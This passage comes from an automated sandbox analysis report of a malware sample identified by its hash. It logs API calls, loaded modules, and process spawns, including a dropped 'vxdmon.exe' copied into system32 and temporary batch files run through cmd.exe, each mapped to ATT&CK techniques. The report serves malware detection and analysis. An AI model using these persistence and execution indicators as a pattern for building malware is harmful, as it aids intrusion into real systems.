\"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004232)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00004232)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00004232)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00004232)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferIdentifyLevel (UID: 00000000-00004232)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferComputeTokenFromLevel (UID: 00000000-00004232)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00004232)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004232)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"130014008e5ae275@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e2b6a@ADVAPI32.dll\"\n \"0e000f00703f2b6a@ADVAPI32.dll\"\n \"0e000f00cc3f2b6a@ADVAPI32.dll\"\n \"11001200b4472b6a@ADVAPI32.dll\"\n \"1100120048482b6a@ADVAPI32.dll\"\n \"120013008c482b6a@ADVAPI32.dll\"\n \"12001300e4482b6a@ADVAPI32.dll\"\n \"14001500386e2b6a@ADVAPI32.dll\"\n \"14001500506e2b6a@ADVAPI32.dll\"\n \"14001500686e2b6a@ADVAPI32.dll\"\n \"17001800806e2b6a@ADVAPI32.dll\"\n \"0d000e00986e2b6a@ADVAPI32.dll\"\n \"11001200a86e2b6a@ADVAPI32.dll\"\n \"11001200bc6e2b6a@ADVAPI32.dll\"\n \"0d000e0044662b6a@WININET.dll\"\n \"0d000e00b4662b6a@WININET.dll\"\n \"10001100ec662b6a@WININET.dll\"\n \"1000110090672b6a@WININET.dll\"\n \"10001100006f2b6a@WININET.dll\"\n \"10001100146f2b6a@WININET.dll\"\n \"14001500286f2b6a@WININET.dll\"\n \"14001500406f2b6a@WININET.dll\"\n \"12001300586f2b6a@WININET.dll\"\n \"120013006c6f2b6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"CreateProcessA\" with parameter \"\\vxdmon.exe\" - (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\r2845.bat\"\" - (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system32\\vxdmon.exe\" - (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\r2564.bat\"\" - (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" has an writable section named \"UPX0\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" has an writable section named \"UPX1\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" has an writable section named \"UPX2\"\n \"vxdmon.exe\" has an writable section named \"UPX0\"\n \"vxdmon.exe\" has an writable section named \"UPX1\"\n \"vxdmon.exe\" has an writable section named \"UPX2\"\n \"VXDMON.EXE.67A9C45E.bin\" has an writable section named \"UPX0\"\n \"VXDMON.EXE.67A9C45E.bin\" has an writable section named \"UPX1\"\n \"VXDMON.EXE.67A9C45E.bin\" has an writable section named \"UPX2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" has an executable section named \"UPX0\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" has an executable section named \"UPX1\"\n \"vxdmon.exe\" has an executable section named \"UPX0\"\n \"vxdmon.exe\" has an executable section named \"UPX1\"\n \"VXDMON.EXE.67A9C45E.bin\" has an executable section named \"UPX0\"\n \"VXDMON.EXE.67A9C45E.bin\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"SECUR32.DLL\" at base 74fb0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"RPCRT4.DLL\" at base 755d0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"SHELL32.DLL\" at base 75f00000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"OLE32.DLL\" at base 76c80000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"ADVAPI32.DLL\" at base 77180000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"KERNEL32.DLL\" at base 76ba0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"PROFAPI.DLL\" at base 75280000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6f640000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 754c0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"WS2_32.DLL\" at base 75ac0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"WINHTTP.DLL\" at base 714e0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"WININET.DLL\" at base 75bd0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74c40000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74c30000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"IPHLPAPI.DLL\" at base 71f60000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75120000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"CRYPTBASE.DLL\" at base 75170000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 740d0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"PROPSYS.DLL\" at base 73db0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"OLEAUT32.DLL\" at base 75a20000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"CLBCATQ.DLL\" at base 772e0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73db0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"NTMARTA.DLL\" at base 746e0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77500000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"APPHELP.DLL\" at base 75120000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6ff70000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 75f00000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ba0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"SETUPAPI.DLL\" at base 76fe0000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76e30000\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75590000\n \"vxdmon.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71900000\n \"vxdmon.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vxdmon.exe\" loaded module \"KERNEL32\" at base 76ba0000\n \"vxdmon.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vxdmon.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a320000\n \"vxdmon.exe\" loaded module \"SECUR32.DLL\" at base 74fb0000\n \"vxdmon.exe\" loaded module \"RPCRT4.DLL\" at base 755d0000\n \"vxdmon.exe\" loaded module \"SHELL32.DLL\" at base 75f00000\n \"vxdmon.exe\" loaded module \"OLE32.DLL\" at base 76c80000\n \"vxdmon.exe\" loaded module \"ADVAPI32.DLL\" at base 77180000\n \"vxdmon.exe\" loaded module \"KERNEL32.DLL\" at base 76ba0000\n \"vxdmon.exe\" loaded module \"PROFAPI.DLL\" at base 75280000\n \"vxdmon.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6f640000\n \"vxdmon.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 754c0000\n \"vxdmon.exe\" loaded module \"WS2_32.DLL\" at base 75ac0000\n \"vxdmon.exe\" loaded module \"WINHTTP.DLL\" at base 714e0000\n \"vxdmon.exe\" loaded module \"WININET.DLL\" at base 75bd0000\n \"vxdmon.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74c40000\n \"vxdmon.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74c30000\n \"vxdmon.exe\" loaded module \"IPHLPAPI.DLL\" at base 71f60000\n \"vxdmon.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75120000\n \"vxdmon.exe\" loaded module \"CRYPTBASE.DLL\" at base 75170000\n \"vxdmon.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 740d0000\n \"vxdmon.exe\" loaded module \"PROPSYS.DLL\" at base 73db0000\n \"vxdmon.exe\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"vxdmon.exe\" loaded module \"OLEAUT32.DLL\" at base 75a20000\n \"vxdmon.exe\" loaded module \"CLBCATQ.DLL\" at base 772e0000\n \"vxdmon.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73db0000\n \"vxdmon.exe\" loaded module \"NTMARTA.DLL\" at base 746e0000\n \"vxdmon.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77500000\n \"vxdmon.exe\" loaded module \"APPHELP.DLL\" at base 75120000\n \"vxdmon.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6ff70000\n \"vxdmon.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 75f00000\n \"vxdmon.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ba0000\n \"vxdmon.exe\" loaded module \"SETUPAPI.DLL\" at base 76fe0000\n \"vxdmon.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76e30000\n \"vxdmon.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75590000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71900000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 76ba0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"ADVAPI32.DLL\" at base 77180000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter WININET.DLL (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\r2845.bat (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter WININET.DLL (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\r2564.bat (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006048)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004016)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004016)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004016)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004016)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004232)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 755D0000\n \"vxdmon.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 755D0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 755D0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"vxdmon.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"vxdmon.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"vxdmon.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vxdmon.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"vxdmon.exe\" with commandline \"\\\\vxdmon.exe\" (UID: 00000000-00006064)\n Spawned process \"vxdmon.exe\" (UID: 00000000-00006048)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2845.bat\" \"\" (UID: 00000000-00004016)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2564.bat\" \"\" (UID: 00000000-00004232)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"vxdmon.exe\" with commandline \"\\\\vxdmon.exe\" (UID: 00000000-00006064)\n Spawned process \"vxdmon.exe\" (UID: 00000000-00006048)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2845.bat\" \"\" (UID: 00000000-00004016)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2564.bat\" \"\" (UID: 00000000-00004232)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2845.bat\" \"\" (UID: 00000000-00004016)\n Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2564.bat\" \"\" (UID: 00000000-00004232)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"vxdmon.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"vxdmon.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"VXDMON.EXE.67A9C45E.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"VXDMON.EXE.67A9C45E.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" was detected as \"Microsoft visual C++ 5.0\"\n \"vxdmon.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"VXDMON.EXE.67A9C45E.bin\" was detected as \"Microsoft visual 